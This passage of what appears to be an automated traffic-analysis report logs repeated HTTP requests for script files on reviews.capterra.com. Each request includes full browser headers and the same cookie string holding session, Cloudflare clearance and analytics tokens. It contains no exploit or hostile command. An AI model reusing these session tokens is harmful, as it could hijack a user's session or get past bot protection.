__cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-b2dc317f7f6b4c6b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-fb999dd119b6be4b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6577.5b5e609812e044d0.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-7ff3395b5b239e11.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-af44b767735d6640.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/779-e50b3615e84c36b9.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6310-a55b4917884e40ce.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8977.dc99403a46707026.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5664.58cbb27e06b11751.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7357.225fc1d616fbda8a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3445.1bd0170ed561aadb.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/630-a3c3b2c58b5440d6.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; 